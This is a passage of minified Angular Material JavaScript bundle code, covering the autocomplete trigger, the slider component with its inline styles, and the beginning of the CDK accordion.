i=e.keyCode,n=Zr(e);if(27===i&&!n&&e.preventDefault(),this.activeOption&&13===i&&this.panelOpen&&!n)this.activeOption._selectViaInteraction(),this._resetActiveItem(),e.preventDefault();else if(this.autocomplete){const r=this.autocomplete._keyManager.activeItem,c=38===i||40===i;9===i||c&&!n&&this.panelOpen?this.autocomplete._keyManager.onKeydown(e):c&&this._canOpen()&&this.openPanel(),(c||this.autocomplete._keyManager.activeItem!==r)&&(this._scrollToOption(this.autocomplete._keyManager.activeItemIndex||0),this.autocomplete.autoSelectActiveOption&&this.activeOption&&(this._pendingAutoselectedOption||(this._valueBeforeAutoSelection=this._element.nativeElement.value),this._pendingAutoselectedOption=this.activeOption,this._assignOptionValue(this.activeOption.value)))}}_handleInput(e){let i=e.target,n=i.value;"number"===i.type&&(n=""==n?null:parseFloat(n)),this._previousValue!==n&&(this._previousValue=n,this._pendingAutoselectedOption=null,this._onChange(n),this._canOpen()&&this._document.activeElement===e.target&&this.openPanel())}_handleFocus(){this._canOpenOnNextFocus?this._canOpen()&&(this._previousValue=this._element.nativeElement.value,this._attachOverlay(),this._floatLabel(!0)):this._canOpenOnNextFocus=!0}_handleClick(){this._canOpen()&&!this.panelOpen&&this.openPanel()}_floatLabel(e=!1){this._formField&&"auto"===this._formField.floatLabel&&(e?this._formField._animateAndLockLabel():this._formField.floatLabel="always",this._manuallyFloatingLabel=!0)}_resetLabel(){this._manuallyFloatingLabel&&(this._formField.floatLabel="auto",this._manuallyFloatingLabel=!1)}_subscribeToClosingActions(){return ra(this._zone.onStable.pipe(Cn(1)),this.autocomplete.options.changes.pipe(qr(()=>this._positionStrategy.reapplyLastPosition()),Z3(0))).pipe(Ur(()=>(this._zone.run(()=>{const n=this.panelOpen;this._resetActiveItem(),this.autocomplete._setVisibility(),this._changeDetectorRef.detectChanges(),this.panelOpen&&this._overlayRef.updatePosition(),n!==this.panelOpen&&(this.panelOpen?this.autocomplete.opened.emit():this.autocomplete.closed.emit())}),this.panelClosingActions)),Cn(1)).subscribe(n=>this._setValueAndClose(n))}_destroyPanel(){this._overlayRef&&(this.closePanel(),this._overlayRef.dispose(),this._overlayRef=null)}_assignOptionValue(e){const i=this.autocomplete&&this.autocomplete.displayWith?this.autocomplete.displayWith(e):e;this._updateNativeInputValue(null!=i?i:"")}_updateNativeInputValue(e){this._formField?this._formField._control.value=e:this._element.nativeElement.value=e,this._previousValue=e}_setValueAndClose(e){const i=e?e.source:this._pendingAutoselectedOption;i&&(this._clearPreviousSelectedOption(i),this._assignOptionValue(i.value),this._onChange(i.value),this.autocomplete._emitSelectEvent(i),this._element.nativeElement.focus()),this.closePanel()}_clearPreviousSelectedOption(e){this.autocomplete.options.forEach(i=>{i!==e&&i.selected&&i.deselect()})}_attachOverlay(){var e;let i=this._overlayRef;i?(this._positionStrategy.setOrigin(this._getConnectedElement()),i.updateSize({width:this._getPanelWidth()})):(this._portal=new Mm(this.autocomplete.template,this._viewContainerRef,{id:null===(e=this._formField)||void 0===e?void 0:e.getLabelId()}),i=this._overlay.create(this._getOverlayConfig()),this._overlayRef=i,this._handleOverlayEvents(i),this._viewportSubscription=this._viewportRuler.change().subscribe(()=>{this.panelOpen&&i&&i.updateSize({width:this._getPanelWidth()})})),i&&!i.hasAttached()&&(i.attach(this._portal),this._closingActionsSubscription=this._subscribeToClosingActions());const n=this.panelOpen;this.autocomplete._setVisibility(),this.autocomplete._isOpen=this._overlayAttached=!0,this.panelOpen&&n!==this.panelOpen&&this.autocomplete.opened.emit()}_getOverlayConfig(){var e;return new bg({positionStrategy:this._getOverlayPosition(),scrollStrategy:this._scrollStrategy(),width:this._getPanelWidth(),direction:this._dir,panelClass:null===(e=this._defaults)||void 0===e?void 0:e.overlayPanelClass})}_getOverlayPosition(){const e=this._overlay.position().flexibleConnectedTo(this._getConnectedElement()).withFlexibleDimensions(!1).withPush(!1);return this._setStrategyPositions(e),this._positionStrategy=e,e}_setStrategyPositions(e){const i=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],n=this._aboveClass,r=[{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom",panelClass:n},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom",panelClass:n}];let c;c="above"===this.position?r:"below"===this.position?i:[...i,...r],e.withPositions(c)}_getConnectedElement(){return this.connectedTo?this.connectedTo.elementRef:this._formField?this._formField.getConnectedOverlayOrigin():this._element}_getPanelWidth(){return this.autocomplete.panelWidth||this._getHostWidth()}_getHostWidth(){return this._getConnectedElement().nativeElement.getBoundingClientRect().width}_resetActiveItem(){const e=this.autocomplete;e.autoActiveFirstOption?e._keyManager.setFirstItemActive():e._keyManager.setActiveItem(-1)}_canOpen(){const e=this._element.nativeElement;return!e.readOnly&&!e.disabled&&!this._autocompleteDisabled}_getWindow(){var e;return(null===(e=this._document)||void 0===e?void 0:e.defaultView)||window}_scrollToOption(e){const i=this.autocomplete,n=$w(e,i.options,i.optionGroups);if(0===e&&1===n)i._setScrollTop(0);else if(i.panel){const r=i.options.toArray()[e];if(r){const c=r._getHostElement(),d=RW(c.offsetTop,c.offsetHeight,i._getScrollTop(),i.panel.nativeElement.offsetHeight);i._setScrollTop(d)}}}_handleOverlayEvents(e){e.keydownEvents().subscribe(i=>{var n;(27===i.keyCode&&!Zr(i)||38===i.keyCode&&Zr(i,"altKey"))&&(this._pendingAutoselectedOption&&(this._updateNativeInputValue(null!==(n=this._valueBeforeAutoSelection)&&void 0!==n?n:""),this._pendingAutoselectedOption=null),this._closeKeyEventStream.next(),this._resetActiveItem(),i.stopPropagation(),i.preventDefault())}),e.outsidePointerEvents().subscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(vs),Ee(fo),Ee(qi),Ee(Ma),Ee(MV),Ee(Cr,8),Ee(cb,9),Ee(ga,8),Ee(bm),Ee(bV,8))},t.\u0275dir=Ot({type:t,inputs:{autocomplete:["matAutocomplete","autocomplete"],position:["matAutocompletePosition","position"],connectedTo:["matAutocompleteConnectedTo","connectedTo"],autocompleteAttribute:["autocomplete","autocompleteAttribute"],autocompleteDisabled:["matAutocompleteDisabled","autocompleteDisabled"]},features:[sa]}),t})(),vV=(()=>{class t extends R2e{constructor(){super(...arguments),this._aboveClass="mat-autocomplete-panel-above"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","matAutocomplete",""],["textarea","matAutocomplete",""]],hostAttrs:[1,"mat-autocomplete-trigger"],hostVars:7,hostBindings:function(e,i){1&e&&he("focusin",function(){return i._handleFocus()})("blur",function(){return i._onTouched()})("input",function(r){return i._handleInput(r)})("keydown",function(r){return i._handleKeydown(r)})("click",function(){return i._handleClick()}),2&e&&Rt("autocomplete",i.autocompleteAttribute)("role",i.autocompleteDisabled?null:"combobox")("aria-autocomplete",i.autocompleteDisabled?null:"list")("aria-activedescendant",i.panelOpen&&i.activeOption?i.activeOption.id:null)("aria-expanded",i.autocompleteDisabled?null:i.panelOpen.toString())("aria-owns",i.autocompleteDisabled||!i.panelOpen||null==i.autocomplete?null:i.autocomplete.id)("aria-haspopup",i.autocompleteDisabled?null:"listbox")},exportAs:["matAutocompleteTrigger"],features:[ki([I2e]),ci]}),t})(),AV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[w2e],imports:[bu,Q3,la,rn,uu,Q3,la]}),t})();const S2e=["sliderWrapper"],Nd=ym({passive:!1}),L2e={provide:Ls,useExisting:ja(()=>TV),multi:!0};class z2e{}const W2e=mp(kd(Jc(class{constructor(t){this._elementRef=t}}),"accent"));let TV=(()=>{class t extends W2e{constructor(e,i,n,r,c,d,T,k){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this._dir=r,this._ngZone=d,this._animationMode=k,this._invert=!1,this._max=100,this._min=0,this._step=1,this._thumbLabel=!1,this._tickInterval=0,this._value=null,this._vertical=!1,this.change=new Tt,this.input=new Tt,this.valueChange=new Tt,this.onTouched=()=>{},this._percent=0,this._isSliding=null,this._isActive=!1,this._tickIntervalPercent=0,this._sliderDimensions=null,this._controlValueAccessorChangeFn=()=>{},this._dirChangeSubscription=I.EMPTY,this._pointerDown=q=>{this.disabled||this._isSliding||!mb(q)&&0!==q.button||this._ngZone.run(()=>{this._touchId=mb(q)?function F2e(t,a){for(let e=0;e<t.touches.length;e++){const i=t.touches[e].target;if(a===i||a.contains(i))return t.touches[e].identifier}}(q,this._elementRef.nativeElement):void 0;const Y=DV(q,this._touchId);if(Y){const te=this.value;this._isSliding="pointer",this._lastPointerEvent=q,this._focusHostElement(),this._onMouseenter(),this._bindGlobalEvents(q),this._focusHostElement(),this._updateValueFromPosition(Y),this._valueOnSlideStart=te,q.cancelable&&q.preventDefault(),te!=this.value&&this._emitInputEvent()}})},this._pointerMove=q=>{if("pointer"===this._isSliding){const Y=DV(q,this._touchId);if(Y){q.cancelable&&q.preventDefault();const te=this.value;this._lastPointerEvent=q,this._updateValueFromPosition(Y),te!=this.value&&this._emitInputEvent()}}},this._pointerUp=q=>{"pointer"===this._isSliding&&(!mb(q)||"number"!=typeof this._touchId||v8(q.changedTouches,this._touchId))&&(q.cancelable&&q.preventDefault(),this._removeGlobalEvents(),this._isSliding=null,this._touchId=void 0,this._valueOnSlideStart!=this.value&&!this.disabled&&this._emitChangeEvent(),this._valueOnSlideStart=this._lastPointerEvent=null)},this._windowBlur=()=>{this._lastPointerEvent&&this._pointerUp(this._lastPointerEvent)},this._document=T,this.tabIndex=parseInt(c)||0,d.runOutsideAngular(()=>{const q=e.nativeElement;q.addEventListener("mousedown",this._pointerDown,Nd),q.addEventListener("touchstart",this._pointerDown,Nd)})}get invert(){return this._invert}set invert(e){this._invert=wi(e)}get max(){return this._max}set max(e){this._max=Uo(e,this._max),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get min(){return this._min}set min(e){this._min=Uo(e,this._min),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get step(){return this._step}set step(e){this._step=Uo(e,this._step),this._step%1!=0&&(this._roundToDecimal=this._step.toString().split(".").pop().length),this._changeDetectorRef.markForCheck()}get thumbLabel(){return this._thumbLabel}set thumbLabel(e){this._thumbLabel=wi(e)}get tickInterval(){return this._tickInterval}set tickInterval(e){this._tickInterval="auto"===e?"auto":"number"==typeof e||"string"==typeof e?Uo(e,this._tickInterval):0}get value(){return null===this._value&&(this.value=this._min),this._value}set value(e){if(e!==this._value){let i=Uo(e,0);this._roundToDecimal&&i!==this.min&&i!==this.max&&(i=parseFloat(i.toFixed(this._roundToDecimal))),this._value=i,this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get displayValue(){return this.displayWith?this.displayWith(this.value):this._roundToDecimal&&this.value&&this.value%1!=0?this.value.toFixed(this._roundToDecimal):this.value||0}focus(e){this._focusHostElement(e)}blur(){this._blurHostElement()}get percent(){return this._clamp(this._percent)}_shouldInvertAxis(){return this.vertical?!this.invert:this.invert}_isMinValue(){return 0===this.percent}_getThumbGap(){return this.disabled?7:this._isMinValue()&&!this.thumbLabel?this._isActive?10:7:0}_getTrackBackgroundStyles(){const i=this.vertical?`1, ${1-this.percent}, 1`:1-this.percent+", 1, 1";return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"-":""}${this._getThumbGap()}px) scale3d(${i})`}}_getTrackFillStyles(){const e=this.percent,n=this.vertical?`1, ${e}, 1`:`${e}, 1, 1`;return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"":"-"}${this._getThumbGap()}px) scale3d(${n})`,display:0===e?"none":""}}_getTicksContainerStyles(){return{transform:`translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"-":""}${this._tickIntervalPercent/2*100}%)`}}_getTicksStyles(){let e=100*this._tickIntervalPercent,d={backgroundSize:this.vertical?`2px ${e}%`:`${e}% 2px`,transform:`translateZ(0) translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"":"-"}${e/2}%)${this.vertical||"rtl"!=this._getDirection()?"":" rotate(180deg)"}`};if(this._isMinValue()&&this._getThumbGap()){const T=this._shouldInvertAxis();let k;k=this.vertical?T?"Bottom":"Top":T?"Right":"Left",d[`padding${k}`]=`${this._getThumbGap()}px`}return d}_getThumbContainerStyles(){const e=this._shouldInvertAxis();return{transform:`translate${this.vertical?"Y":"X"}(-${100*(("rtl"!=this._getDirection()||this.vertical?e:!e)?this.percent:1-this.percent)}%)`}}_shouldInvertMouseCoords(){const e=this._shouldInvertAxis();return"rtl"!=this._getDirection()||this.vertical?e:!e}_getDirection(){return this._dir&&"rtl"==this._dir.value?"rtl":"ltr"}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{this._isActive=!!e&&"keyboard"!==e,this._changeDetectorRef.detectChanges()}),this._dir&&(this._dirChangeSubscription=this._dir.change.subscribe(()=>{this._changeDetectorRef.markForCheck()}))}ngOnDestroy(){const e=this._elementRef.nativeElement;e.removeEventListener("mousedown",this._pointerDown,Nd),e.removeEventListener("touchstart",this._pointerDown,Nd),this._lastPointerEvent=null,this._removeGlobalEvents(),this._focusMonitor.stopMonitoring(this._elementRef),this._dirChangeSubscription.unsubscribe()}_onMouseenter(){this.disabled||(this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent())}_onFocus(){this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent()}_onBlur(){this.onTouched()}_onKeydown(e){if(this.disabled||Zr(e)||this._isSliding&&"keyboard"!==this._isSliding)return;const i=this.value;switch(e.keyCode){case 33:this._increment(10);break;case 34:this._increment(-10);break;case 35:this.value=this.max;break;case 36:this.value=this.min;break;case 37:this._increment("rtl"==this._getDirection()?1:-1);break;case 38:this._increment(1);break;case 39:this._increment("rtl"==this._getDirection()?-1:1);break;case 40:this._increment(-1);break;default:return}i!=this.value&&(this._emitInputEvent(),this._emitChangeEvent()),this._isSliding="keyboard",e.preventDefault()}_onKeyup(){"keyboard"===this._isSliding&&(this._isSliding=null)}_getWindow(){return this._document.defaultView||window}_bindGlobalEvents(e){const i=this._document,n=mb(e),c=n?"touchend":"mouseup";i.addEventListener(n?"touchmove":"mousemove",this._pointerMove,Nd),i.addEventListener(c,this._pointerUp,Nd),n&&i.addEventListener("touchcancel",this._pointerUp,Nd);const d=this._getWindow();void 0!==d&&d&&d.addEventListener("blur",this._windowBlur)}_removeGlobalEvents(){const e=this._document;e.removeEventListener("mousemove",this._pointerMove,Nd),e.removeEventListener("mouseup",this._pointerUp,Nd),e.removeEventListener("touchmove",this._pointerMove,Nd),e.removeEventListener("touchend",this._pointerUp,Nd),e.removeEventListener("touchcancel",this._pointerUp,Nd);const i=this._getWindow();void 0!==i&&i&&i.removeEventListener("blur",this._windowBlur)}_increment(e){const i=this._clamp(this.value||0,this.min,this.max);this.value=this._clamp(i+this.step*e,this.min,this.max)}_updateValueFromPosition(e){if(!this._sliderDimensions)return;let c=this._clamp(((this.vertical?e.y:e.x)-(this.vertical?this._sliderDimensions.top:this._sliderDimensions.left))/(this.vertical?this._sliderDimensions.height:this._sliderDimensions.width));if(this._shouldInvertMouseCoords()&&(c=1-c),0===c)this.value=this.min;else if(1===c)this.value=this.max;else{const d=this._calculateValue(c),T=Math.round((d-this.min)/this.step)*this.step+this.min;this.value=this._clamp(T,this.min,this.max)}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.value),this.valueChange.emit(this.value),this.change.emit(this._createChangeEvent())}_emitInputEvent(){this.input.emit(this._createChangeEvent())}_updateTickIntervalPercent(){if(!this.tickInterval||!this._sliderDimensions)return;let e;if("auto"==this.tickInterval){let i=this.vertical?this._sliderDimensions.height:this._sliderDimensions.width;e=Math.ceil(30/(i*this.step/(this.max-this.min)))*this.step/i}else e=this.tickInterval*this.step/(this.max-this.min);this._tickIntervalPercent=EV(e)?e:0}_createChangeEvent(e=this.value){let i=new z2e;return i.source=this,i.value=e,i}_calculatePercentage(e){const i=((e||0)-this.min)/(this.max-this.min);return EV(i)?i:0}_calculateValue(e){return this.min+e*(this.max-this.min)}_clamp(e,i=0,n=1){return Math.max(i,Math.min(e,n))}_getSliderDimensions(){return this._sliderWrapper?this._sliderWrapper.nativeElement.getBoundingClientRect():null}_focusHostElement(e){this._elementRef.nativeElement.focus(e)}_blurHostElement(){this._elementRef.nativeElement.blur()}writeValue(e){this.value=e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Ee(Cr,8),Vr("tabindex"),Ee(qi),Ee(ga),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slider"]],viewQuery:function(e,i){if(1&e&&Mi(S2e,5),2&e){let n;Vt(n=Bt())&&(i._sliderWrapper=n.first)}},hostAttrs:["role","slider",1,"mat-slider","mat-focus-indicator"],hostVars:29,hostBindings:function(e,i){1&e&&he("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)})("keyup",function(){return i._onKeyup()})("mouseenter",function(){return i._onMouseenter()})("selectstart",function(r){return r.preventDefault()}),2&e&&(Gs("tabIndex",i.tabIndex),Rt("aria-disabled",i.disabled)("aria-valuemax",i.max)("aria-valuemin",i.min)("aria-valuenow",i.value)("aria-valuetext",null==i.valueText?i.displayValue:i.valueText)("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-slider-disabled",i.disabled)("mat-slider-has-ticks",i.tickInterval)("mat-slider-horizontal",!i.vertical)("mat-slider-axis-inverted",i._shouldInvertAxis())("mat-slider-invert-mouse-coords",i._shouldInvertMouseCoords())("mat-slider-sliding",i._isSliding)("mat-slider-thumb-label-showing",i.thumbLabel)("mat-slider-vertical",i.vertical)("mat-slider-min-value",i._isMinValue())("mat-slider-hide-last-tick",i.disabled||i._isMinValue()&&i._getThumbGap()&&i._shouldInvertAxis())("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disabled:"disabled",color:"color",tabIndex:"tabIndex",invert:"invert",max:"max",min:"min",step:"step",thumbLabel:"thumbLabel",tickInterval:"tickInterval",value:"value",displayWith:"displayWith",valueText:"valueText",vertical:"vertical"},outputs:{change:"change",input:"input",valueChange:"valueChange"},exportAs:["matSlider"],features:[ki([L2e]),ci],decls:13,vars:6,consts:[[1,"mat-slider-wrapper"],["sliderWrapper",""],[1,"mat-slider-track-wrapper"],[1,"mat-slider-track-background",3,"ngStyle"],[1,"mat-slider-track-fill",3,"ngStyle"],[1,"mat-slider-ticks-container",3,"ngStyle"],[1,"mat-slider-ticks",3,"ngStyle"],[1,"mat-slider-thumb-container",3,"ngStyle"],[1,"mat-slider-focus-ring"],[1,"mat-slider-thumb"],[1,"mat-slider-thumb-label"],[1,"mat-slider-thumb-label-text"]],template:function(e,i){1&e&&(m(0,"div",0,1)(2,"div",2),it(3,"div",3)(4,"div",4),u(),m(5,"div",5),it(6,"div",6),u(),m(7,"div",7),it(8,"div",8)(9,"div",9),m(10,"div",10)(11,"span",11),s(12),u()()()()),2&e&&(C(3),V("ngStyle",i._getTrackBackgroundStyles()),C(1),V("ngStyle",i._getTrackFillStyles()),C(1),V("ngStyle",i._getTicksContainerStyles()),C(1),V("ngStyle",i._getTicksStyles()),C(1),V("ngStyle",i._getThumbContainerStyles()),C(5),ke(i.displayValue))},dependencies:[Yv],styles:['.mat-slider{display:inline-block;position:relative;box-sizing:border-box;padding:8px;outline:none;vertical-align:middle}.mat-slider:not(.mat-slider-disabled):active,.mat-slider.mat-slider-sliding:not(.mat-slider-disabled){cursor:grabbing}.mat-slider-wrapper{-webkit-print-color-adjust:exact;color-adjust:exact;position:absolute}.mat-slider-track-wrapper{position:absolute;top:0;left:0;overflow:hidden}.mat-slider-track-fill{position:absolute;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-track-background{position:absolute;transform-origin:100% 100%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-ticks-container{position:absolute;left:0;top:0;overflow:hidden}.mat-slider-ticks{-webkit-background-clip:content-box;background-clip:content-box;background-repeat:repeat;box-sizing:border-box;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-container{position:absolute;z-index:1;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-focus-ring{position:absolute;width:30px;height:30px;border-radius:50%;transform:scale(0);opacity:0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider.cdk-keyboard-focused .mat-slider-focus-ring,.mat-slider.cdk-program-focused .mat-slider-focus-ring{transform:scale(1);opacity:1}.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb-label,.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb{cursor:grab}.mat-slider-thumb{position:absolute;right:-10px;bottom:-10px;box-sizing:border-box;width:20px;height:20px;border:3px solid rgba(0,0,0,0);border-radius:50%;transform:scale(0.7);transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-label{display:none;align-items:center;justify-content:center;position:absolute;width:28px;height:28px;border-radius:50%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-radius 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.cdk-high-contrast-active .mat-slider-thumb-label{outline:solid 1px}.mat-slider-thumb-label-text{z-index:1;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-sliding .mat-slider-track-fill,.mat-slider-sliding .mat-slider-track-background,.mat-slider-sliding .mat-slider-thumb-container{transition-duration:0ms}.mat-slider-has-ticks .mat-slider-wrapper::after{content:"";position:absolute;border-width:0;border-style:solid;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after,.mat-slider-has-ticks:hover:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after{opacity:1}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-disabled) .mat-slider-ticks,.mat-slider-has-ticks:hover:not(.mat-slider-disabled) .mat-slider-ticks{opacity:1}.mat-slider-thumb-label-showing .mat-slider-focus-ring{display:none}.mat-slider-thumb-label-showing .mat-slider-thumb-label{display:flex}.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:100% 100%}.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:0 0}.mat-slider:not(.mat-slider-disabled).cdk-focused.mat-slider-thumb-label-showing .mat-slider-thumb{transform:scale(0)}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label{border-radius:50% 50% 0}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label-text{opacity:1}.mat-slider:not(.mat-slider-disabled).cdk-mouse-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-touch-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-program-focused .mat-slider-thumb{border-width:2px;transform:scale(1)}.mat-slider-disabled .mat-slider-focus-ring{transform:scale(0);opacity:0}.mat-slider-disabled .mat-slider-thumb{border-width:4px;transform:scale(0.5)}.mat-slider-disabled .mat-slider-thumb-label{display:none}.mat-slider-horizontal{height:48px;min-width:128px}.mat-slider-horizontal .mat-slider-wrapper{height:2px;top:23px;left:8px;right:8px}.mat-slider-horizontal .mat-slider-wrapper::after{height:2px;border-left-width:2px;right:0;top:0}.mat-slider-horizontal .mat-slider-track-wrapper{height:2px;width:100%}.mat-slider-horizontal .mat-slider-track-fill{height:2px;width:100%;transform:scaleX(0)}.mat-slider-horizontal .mat-slider-track-background{height:2px;width:100%;transform:scaleX(1)}.mat-slider-horizontal .mat-slider-ticks-container{height:2px;width:100%}.cdk-high-contrast-active .mat-slider-horizontal .mat-slider-ticks-container{height:0;outline:solid 2px;top:1px}.mat-slider-horizontal .mat-slider-ticks{height:2px;width:100%}.mat-slider-horizontal .mat-slider-thumb-container{width:100%;height:0;top:50%}.mat-slider-horizontal .mat-slider-focus-ring{top:-15px;right:-15px}.mat-slider-horizontal .mat-slider-thumb-label{right:-14px;top:-40px;transform:translateY(26px) scale(0.01) rotate(45deg)}.mat-slider-horizontal .mat-slider-thumb-label-text{transform:rotate(-45deg)}.mat-slider-horizontal.cdk-focused .mat-slider-thumb-label{transform:rotate(45deg)}.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label,.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label-text{transform:none}.mat-slider-vertical{width:48px;min-height:128px}.mat-slider-vertical .mat-slider-wrapper{width:2px;top:8px;bottom:8px;left:23px}.mat-slider-vertical .mat-slider-wrapper::after{width:2px;border-top-width:2px;bottom:0;left:0}.mat-slider-vertical .mat-slider-track-wrapper{height:100%;width:2px}.mat-slider-vertical .mat-slider-track-fill{height:100%;width:2px;transform:scaleY(0)}.mat-slider-vertical .mat-slider-track-background{height:100%;width:2px;transform:scaleY(1)}.mat-slider-vertical .mat-slider-ticks-container{width:2px;height:100%}.cdk-high-contrast-active .mat-slider-vertical .mat-slider-ticks-container{width:0;outline:solid 2px;left:1px}.mat-slider-vertical .mat-slider-focus-ring{bottom:-15px;left:-15px}.mat-slider-vertical .mat-slider-ticks{width:2px;height:100%}.mat-slider-vertical .mat-slider-thumb-container{height:100%;width:0;left:50%}.mat-slider-vertical .mat-slider-thumb{-webkit-backface-visibility:hidden;backface-visibility:hidden}.mat-slider-vertical .mat-slider-thumb-label{bottom:-14px;left:-40px;transform:translateX(26px) scale(0.01) rotate(-45deg)}.mat-slider-vertical .mat-slider-thumb-label-text{transform:rotate(45deg)}.mat-slider-vertical.cdk-focused .mat-slider-thumb-label{transform:rotate(-45deg)}[dir=rtl] .mat-slider-wrapper::after{left:0;right:auto}[dir=rtl] .mat-slider-horizontal .mat-slider-track-fill{transform-origin:100% 100%}[dir=rtl] .mat-slider-horizontal .mat-slider-track-background{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:100% 100%}.mat-slider._mat-animation-noopable .mat-slider-track-fill,.mat-slider._mat-animation-noopable .mat-slider-track-background,.mat-slider._mat-animation-noopable .mat-slider-ticks,.mat-slider._mat-animation-noopable .mat-slider-thumb-container,.mat-slider._mat-animation-noopable .mat-slider-focus-ring,.mat-slider._mat-animation-noopable .mat-slider-thumb,.mat-slider._mat-animation-noopable .mat-slider-thumb-label,.mat-slider._mat-animation-noopable .mat-slider-thumb-label-text,.mat-slider._mat-animation-noopable .mat-slider-has-ticks .mat-slider-wrapper::after{transition:none}'],encapsulation:2,changeDetection:0}),t})();function EV(t){return!isNaN(t)&&isFinite(t)}function mb(t){return"t"===t.type[0]}function DV(t,a){let e;return e=mb(t)?"number"==typeof a?v8(t.touches,a)||v8(t.changedTouches,a):t.touches[0]||t.changedTouches[0]:t,e?{x:e.clientX,y:e.clientY}:void 0}function v8(t,a){for(let e=0;e<t.length;e++)if(t[e].identifier===a)return t[e]}let xV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,la]}),t})(),V2e=0;const A8=new ni("CdkAccordion");let B2e=(()=>{class t{constructor(){this._stateChanges=new J,this._openCloseAllActions=new J,this.id="cdk-accordion-"+V2e++,this._multi=!1}get multi(){return this._multi}set multi(e){this._multi=wi(e)}openAll(){this._multi&&this._openCloseAllActions.next(!0)}closeAll(){this._openCloseAllActions.next(!1)}ngOnChanges(e){this._stateChanges.next(e)}ngOnDestroy(){this._stateChanges.complete(),this._openCloseAllActions.complete()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["cdk-accordion"],["","cdkAccordion",""]],inputs:{multi:"multi"},exportAs:["cdkAccordion"],features:[ki([{provide:A8,useExisting:t}]),sa]}),t})(),H2e=0,U2e=(()=>{class t{constructor(e,i,n){this.accordion=e,this._changeDetectorRef=i,this._expansionDispatcher=n,this._openCloseAllSubscription=I.EMPTY,this.closed=new Tt,this.opened=new Tt,this.destroyed=new Tt,this.expandedChange=new Tt,this.id="cdk-accordion-child-"+H2e++,this._expanded=!1,this._disabled=!1,this._removeUniqueSelectionListener=()=>{},this._removeUniqueSelectionListener=n.listen((r,c)=>{this.accordion&&!this.accordion.multi&&this.accordion.id===c&&this.id!==r&&(this.expanded=!1)}),this.accordion&&(this._openCloseAllSubscription=this._subscribeToOpenCloseAllActions())}get expanded(){return this._expanded}set 